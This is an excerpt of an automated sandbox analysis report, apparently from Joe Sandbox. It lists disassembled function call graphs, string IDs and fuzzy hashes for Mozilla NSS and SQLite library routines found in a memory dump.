                                                                • Part of subcall function 6D1E09D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D1E0BCB
                                                                • Part of subcall function 6D1E09D0: EnterCriticalSection.KERNEL32(?), ref: 6D1E0BDE
                                                                • Part of subcall function 6D1E09D0: OutputDebugStringA.KERNEL32(?), ref: 6D1E0C16
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                              • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                              • API String ID: 420000887-1567254798
                                                              • Opcode ID: 2a475dd95901db7fd39d8baa5769bef2f01c000ad9b60314ae8638cb4bcbfb90
                                                              • Instruction ID: 58067b18bf7aab9dfb747beb3c45481ef08e8a5e008d2d2edbe0dea9bfada4a2
                                                              • Opcode Fuzzy Hash: 2a475dd95901db7fd39d8baa5769bef2f01c000ad9b60314ae8638cb4bcbfb90
                                                              • Instruction Fuzzy Hash: D3218CB9105104AFDB30AF55DE8CB5A3BB5EB8631DF068015F60897126DFB18C45DBE1
                                                              APIs
                                                              • PORT_NewArena_Util.NSS3(00000400), ref: 6D144DCB
                                                                • Part of subcall function 6D130FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6D0D87ED,00000800,6D0CEF74,00000000), ref: 6D131000
                                                                • Part of subcall function 6D130FF0: PR_NewLock.NSS3(?,00000800,6D0CEF74,00000000), ref: 6D131016
                                                                • Part of subcall function 6D130FF0: PL_InitArenaPool.NSS3(00000000,security,6D0D87ED,00000008,?,00000800,6D0CEF74,00000000), ref: 6D13102B
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6D144DE1
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6D144DFF
                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D144E59
                                                                • Part of subcall function 6D12FAB0: free.MOZGLUE(?,-00000001,?,?,6D0CF673,00000000,00000000), ref: 6D12FAC7
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D20300C,00000000), ref: 6D144EB8
                                                              • SECOID_FindOID_Util.NSS3(?), ref: 6D144EFF
                                                              • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6D144F56
                                                              • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6D14521A
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                              • String ID:
                                                              • API String ID: 1025791883-0
                                                              • Opcode ID: d3847decd6429c7e309ff2214cd3759dc477d3201eab8b45223001bc304b5551
                                                              • Instruction ID: 5957a687f447248deec83b05692e3a5483da1917b2af2f5532084cde0d3e3733
                                                              • Opcode Fuzzy Hash: d3847decd6429c7e309ff2214cd3759dc477d3201eab8b45223001bc304b5551
                                                              • Instruction Fuzzy Hash: 69F19F75E0420ACFEB04CF98D4407BEB7B2BF58354F258169D914AB289E7B5E981CB90
                                                              APIs
                                                              • SECOID_GetAlgorithmTag_Util.NSS3(6D142C2A), ref: 6D140C81
                                                                • Part of subcall function 6D12BE30: SECOID_FindOID_Util.NSS3(6D0E311B,00000000,?,6D0E311B,?), ref: 6D12BE44
                                                                • Part of subcall function 6D118500: SECOID_GetAlgorithmTag_Util.NSS3(6D1195DC,00000000,00000000,00000000,?,6D1195DC,00000000,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D118517
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140CC4
                                                                • Part of subcall function 6D12FAB0: free.MOZGLUE(?,-00000001,?,?,6D0CF673,00000000,00000000), ref: 6D12FAC7
                                                              • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D140CD5
                                                              • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6D140D1D
                                                              • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6D140D3B
                                                              • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6D140D7D
                                                              • free.MOZGLUE(00000000), ref: 6D140DB5
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140DC1
                                                              • free.MOZGLUE(00000000), ref: 6D140DF7
                                                              • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6D140E05
                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6D140E0F
                                                                • Part of subcall function 6D1195C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D1195E0
                                                                • Part of subcall function 6D1195C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D1195F5
                                                                • Part of subcall function 6D1195C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6D119609
                                                                • Part of subcall function 6D1195C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6D11961D
                                                                • Part of subcall function 6D1195C0: PK11_GetInternalSlot.NSS3 ref: 6D11970B
                                                                • Part of subcall function 6D1195C0: PK11_FreeSymKey.NSS3(00000000), ref: 6D119756
                                                                • Part of subcall function 6D1195C0: PK11_GetIVLength.NSS3(?), ref: 6D119767
                                                                • Part of subcall function 6D1195C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6D11977E
                                                                • Part of subcall function 6D1195C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6D11978E
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                              • String ID:
                                                              • API String ID: 3136566230-0
                                                              • Opcode ID: e23233274cb5a1203113ce8d882a2468c60c1bc15de903c591e5d531e92149a8
                                                              • Instruction ID: 7a7f546b57772de06db398a9e8fd1a5bb6a64be8845f288528cc0ee7b773b2f0
                                                              • Opcode Fuzzy Hash: e23233274cb5a1203113ce8d882a2468c60c1bc15de903c591e5d531e92149a8
                                                              • Instruction Fuzzy Hash: DD41A3B1D04206ABEB009F66DC45BBF7674BF64318F018024FE156B245EBB5EA54CBE2
                                                              APIs
                                                              • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6D0EFCBD
                                                              • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6D0EFCCC
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6D0EFCEF
                                                              • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D0EFD32
                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6D0EFD46
                                                              • PORT_Alloc_Util.NSS3(00000001), ref: 6D0EFD51
                                                              • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6D0EFD6D
                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6D0EFD84
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                              • String ID: :
                                                              • API String ID: 183580322-336475711
                                                              • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                              • Instruction ID: a56310c25bdc2b88e94b6758966ad18778810c5487655e9635b0c949a36ce52f
                                                              • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                              • Instruction Fuzzy Hash: 3831B1B6D082169FFB018AA4EC0576F7FEDAF84798F164425DD14A7200E7B2EA14C7D2
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_DigestInit), ref: 6D106C66
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D106C94
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D106CA3
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D106CB9
                                                              • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6D106CD5
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                              • API String ID: 1003633598-3690128261
                                                              • Opcode ID: bcdb5f001e20b4ce2806ac9e24311d14d5f77365dac1f73c67d2da69f5e3940d
                                                              • Instruction ID: f9baf7258cdb7b0d4a528d225a28842ef791f6fa11906744e56058d425997437
                                                              • Opcode Fuzzy Hash: bcdb5f001e20b4ce2806ac9e24311d14d5f77365dac1f73c67d2da69f5e3940d
                                                              • Instruction Fuzzy Hash: EC21F5785041089BD720BF65AE8CB6F37B5EF8231CF064024E60997217DFB09985CBE2
                                                              APIs
                                                              • PR_LogPrint.NSS3(C_SessionCancel), ref: 6D109DF6
                                                              • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6D109E24
                                                              • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6D109E33
                                                                • Part of subcall function 6D1ED930: PL_strncpyz.NSS3(?,?,?), ref: 6D1ED963
                                                              • PR_LogPrint.NSS3(?,00000000), ref: 6D109E49
                                                              • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6D109E65
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000C.00000002.2584839646.000000006D051000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6D050000, based on PE: true
                                                              • Associated: 0000000C.00000002.2584506740.000000006D050000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587384394.000000006D1EF000.00000002.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2587838662.000000006D22E000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588003386.000000006D22F000.00000008.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588145231.000000006D230000.00000004.00000001.01000000.0000000C.sdmp
                                                              • Associated: 0000000C.00000002.2588296384.000000006D235000.00000002.00000001.01000000.0000000C.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_12_2_6d050000_katDDA4.jbxd
                                                              Similarity
                                                              • API ID: Print$L_strncpyz$L_strcatn
                                                              • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                              • API String ID: 1003633598-1678415578
                                                              • Opcode ID: a586153309a37b4ab9fdf489d54709a7be29679021bd4dd8fedae10a4f63b924
                                                              • Instruction ID: 16430d83e77de8bfd25b801b3be535860d3408c81aa2cdb25af32cf5a29e893a
                                                              • Opcode Fuzzy Hash: a586153309a37b4ab9fdf489d54709a7be29679021bd4dd8fedae10a4f63b924
                                                              • Instruction Fuzzy Hash: A02126B45441089FD720AF55DEACB2F33B4EF8270CF0A4024EA09A7216DFB49D45CBA2
                                                              APIs
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,6D0D7D8F,6D0D7D8F,?,?), ref: 6D0D6DC8
                                                                • Part of subcall function 6D12FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6D12FE08
                                                                • Part of subcall function 6D12FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6D12FE1D
                                                                • Part of subcall function 6D12FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6D12FE62
                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6D0D7D8F,?,?), ref: 6D0D6DD5
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D1310F3
                                                                • Part of subcall function 6D1310C0: EnterCriticalSection.KERNEL32(?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13110C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131141
                                                                • Part of subcall function 6D1310C0: PR_Unlock.NSS3(?,?,?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D131182
                                                                • Part of subcall function 6D1310C0: TlsGetValue.KERNEL32(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13119C
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FA0,00000000,?,?,?,?,6D0D7D8F,?,?), ref: 6D0D6DF7
                                                                • Part of subcall function 6D12B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D2018D0,?), ref: 6D12B095
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D0D6E35
                                                                • Part of subcall function 6D12FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6D12FE29
                                                                • Part of subcall function 6D12FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6D12FE3D
                                                                • Part of subcall function 6D12FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6D12FE6F
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D0D6E4C
                                                                • Part of subcall function 6D1310C0: PL_ArenaAllocate.NSS3(?,6D0D8802,00000000,00000008,?,6D0CEF74,00000000), ref: 6D13116E
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FE0,00000000), ref: 6D0D6E82
                                                                • Part of subcall function 6D0D6AF0: SECITEM_ArenaDupItem_Util.NSS3(00000000,6D0DB21D,00000000,00000000,6D0DB219,?,6D0D6BFB,00000000,?,00000000,00000000,?,?,?,6D0DB21D), ref: 6D0D6B01
                                                                • Part of subcall function 6D0D6AF0: SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,00000000), ref: 6D0D6B8A
                                                              • SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6D0D6F1E
                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6D0D6F35
                                                              • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6D1F8FE0,00000000), ref: 6D0D6F6B
                                                              • PR_SetError.NSS3(FFFFE005,00000000,6D0D7D8F,?,?), ref: 6D0D6FE1
                                                              Similarity
                                                              • API ID: Util$Arena$Item_$Alloc_$DecodeQuick$AllocateErrorValue$CriticalEnterSectionUnlockfreememcpy
                                                              • String ID:
                                                              • API String ID: 587344769-0
                                                              • Opcode ID: 62eeb3207c5ff32d77833829839a5f67bc009d8d8e957a5131f144d6e7c021a9
                                                              • Instruction ID: 6a100c6c05b124d167988eec97c9987b772d884a0b4a39384952a75d9ff8557c
                                                              • Opcode Fuzzy Hash: 62eeb3207c5ff32d77833829839a5f67bc009d8d8e957a5131f144d6e7c021a9
                                                              • Instruction Fuzzy Hash: 5B716C71D0474A9FEB40CF55CD40BBABBE4BF94308F56422AE9189B211E771EA94CBD0
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE10
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE24
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,6D0FD079,00000000,00000001), ref: 6D11AE5A
                                                              • memset.VCRUNTIME140(85145F8B,00000000,8D1474DB,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE6F
                                                              • free.MOZGLUE(85145F8B,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AE7F
                                                              • TlsGetValue.KERNEL32(?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEB1
                                                              • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEC9
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AEF1
                                                              • free.MOZGLUE(6D0FCDBB,?,?,?,?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?), ref: 6D11AF0B
                                                              • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,6D0FCDBB,?,6D0FD079,00000000,00000001), ref: 6D11AF30
                                                              Similarity
                                                              • API ID: Unlock$CriticalEnterSectionValuefree$memset
                                                              • String ID:
                                                              • API String ID: 161582014-0
                                                              • Opcode ID: 8a32268d7c98aef127fd10cbcc7a04e00c3028600a7588c36fdcb21ac951aa75
                                                              • Instruction ID: 00b46208c11954b33c2cc034eff4f501a06f66725e21750d70a55ce6a8faa593
                                                              • Opcode Fuzzy Hash: 8a32268d7c98aef127fd10cbcc7a04e00c3028600a7588c36fdcb21ac951aa75
                                                              • Instruction Fuzzy Hash: 2651D1B5908602EFDB05CF24DC84B2ABBB4FF04314F014264E91897615E7B1F8A9CBD1
                                                              APIs
                                                              • TlsGetValue.KERNEL32(?,00000000,00000000,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CB4
                                                              • EnterCriticalSection.KERNEL32(0000001C,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CC8
                                                              • TlsGetValue.KERNEL32(?,6D0FAB7F,?,00000000,?), ref: 6D0F4CE0
                                                              • EnterCriticalSection.KERNEL32(?,?,6D0FAB7F,?,00000000,?), ref: 6D0F4CF4
                                                              • PL_HashTableLookup.NSS3(?,?,?,6D0FAB7F,?,00000000,?), ref: 6D0F4D03
                                                              • PR_Unlock.NSS3(?,00000000,?), ref: 6D0F4D10
                                                                • Part of subcall function 6D17DD70: TlsGetValue.KERNEL32 ref: 6D17DD8C
                                                                • Part of subcall function 6D17DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D17DDB4
                                                              • PR_Now.NSS3(?,00000000,?), ref: 6D0F4D26
                                                                • Part of subcall function 6D199DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DC6
                                                                • Part of subcall function 6D199DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6D1E0A27), ref: 6D199DD1
                                                                • Part of subcall function 6D199DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6D199DED
                                                              • PR_Unlock.NSS3(?,?,00000000,?), ref: 6D0F4D98
                                                              • PR_Unlock.NSS3(?,?,?,00000000,?), ref: 6D0F4DDA
                                                              • PR_Unlock.NSS3(?,?,?,?,00000000,?), ref: 6D0F4E02
                                                              Similarity
                                                              • API ID: Unlock$CriticalSectionTimeValue$EnterSystem$FileHashLeaveLookupTableUnothrow_t@std@@@__ehfuncinfo$??2@
                                                              • String ID:
                                                              • API String ID: 4032354334-0
                                                              • Opcode ID: a6c5c46fd66354bf13b1df8caab8566fc1510bfab5a611e12d89c74c62d41d05
                                                              • Instruction ID: bfa34fa0796d55181e4d793b1d95a22085832c374ee54cc7cfb667db2f76999b
                                                              • Opcode Fuzzy Hash: a6c5c46fd66354bf13b1df8caab8566fc1510bfab5a611e12d89c74c62d41d05
                                                              • Instruction Fuzzy Hash: 8541B4B5D04205AFFB119F64ED44B2A77B8BF49258F164170ED0887312EB31D965CBE2
                                                              APIs
                                                              • sqlite3_initialize.NSS3 ref: 6D0BFD18
                                                              • sqlite3_initialize.NSS3 ref: 6D0BFD5F
                                                              • memset.VCRUNTIME140(00000000,00000000,?), ref: 6D0BFD89
                                                              • memcpy.VCRUNTIME140(00000000,00000000,?), ref: 6D0BFD99
                                                              • sqlite3_free.NSS3(00000000), ref: 6D0BFE3C
                                                              • sqlite3_free.NSS3(?), ref: 6D0BFEE3
                                                              • sqlite3_free.NSS3(?), ref: 6D0BFEEE
                                                              Strings
                                                              Similarity
                                                              • API ID: sqlite3_free$sqlite3_initialize$memcpymemset
                                                              • String ID: simple
                                                              • API String ID: 1130978851-3246079234
                                                              • Opcode ID: 05c2cf294e538cf5484580b3293261be9b2171119eb57b42c55c06ca22c05436
                                                              • Instruction ID: 61908ee3e4577bfeda203282f1f059c44d2f97699cb5796edb71f3eccbcd237f
                                                              • Opcode Fuzzy Hash: 05c2cf294e538cf5484580b3293261be9b2171119eb57b42c55c06ca22c05436
                                                              • Instruction Fuzzy Hash: 92915DB8A082068FEB04CF55C980B7ABBFAFF84314F15C168D9299B352D732E951CB50
                                                              APIs
                                                              • _byteswap_ushort.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D0ADDF9
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00012806,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D0ADE68
                                                              • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,0001280D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6D0ADE97
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(00000000), ref: 6D0ADEB6
                                                              • _byteswap_ulong.API-MS-WIN-CRT-UTILITY-L1-1-0(?), ref: 6D0ADF78
                                                              Strings
                                                              Similarity
                                                              • API ID: _byteswap_ulongsqlite3_log$_byteswap_ushort
                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                              • API String ID: 1526119172-598938438
                                                              • Opcode ID: a7601ea0631777dfaf9ca047cde924fb707f5a9b6799512ce5426fe2d6a89d94
                                                              • Instruction ID: 43f292ecb42acc0f74eeae035376d26523db385e4f6b6f97c5d4f9eea448eda8
                                                              • Opcode Fuzzy Hash: a7601ea0631777dfaf9ca047cde924fb707f5a9b6799512ce5426fe2d6a89d94
                                                              • Instruction Fuzzy Hash: 25819F71A083019FE714DFA5C884B2A77E1BF85308F19886DED9A8B252F735E841C762
                                                              APIs
                                                              • memcpy.VCRUNTIME140(?,00000100,?), ref: 6D11CD08
                                                              • PK11_DoesMechanism.NSS3(?,?), ref: 6D11CE16
                                                              • PR_SetError.NSS3(00000000,00000000), ref: 6D11D079
                                                                • Part of subcall function 6D17C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D17C2BF
                                                              Similarity
                                                              • API ID: DoesErrorK11_MechanismValuememcpy
                                                              • String ID:
                                                              • API String ID: 1351604052-0
                                                              • Opcode ID: d682b63feb19ca57142856f2f7d7a732ddba6dc6807d16f5af4a7204aaa01288
                                                              • Instruction ID: 2b9ee9d47d28a1abeb09f45ba0f98807b99e3e6a970b0a8db9a26be1c2d5216a
                                                              • Opcode Fuzzy Hash: d682b63feb19ca57142856f2f7d7a732ddba6dc6807d16f5af4a7204aaa01288
                                                              • Instruction Fuzzy Hash: 07C191B190421A9BDB20CF24CC80BDAB7B5BF58318F0541B8E94CA7245E7B5EE95CF90
                                                              APIs
                                                              • PORT_Alloc_Util.NSS3(0000000C,?,?,00000000,?,6D1197C1,?,00000000,00000000,?,?,?,00000000,?,6D0F7F4A,00000000), ref: 6D10DC68
                                                                • Part of subcall function 6D130BE0: malloc.MOZGLUE(6D128D2D,?,00000000,?), ref: 6D130BF8
                                                                • Part of subcall function 6D130BE0: TlsGetValue.KERNEL32(6D128D2D,?,00000000,?), ref: 6D130C15
                                                              • PORT_Alloc_Util.NSS3(00000008,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DD36
                                                              • PORT_Alloc_Util.NSS3(?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE2D
                                                              • memcpy.VCRUNTIME140(00000000,00000000,?,?,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE43
                                                              • PORT_Alloc_Util.NSS3(0000000C,00000000,?,?,?,00000000,?,6D0F7F4A,00000000,?,00000000,00000000), ref: 6D10DE76
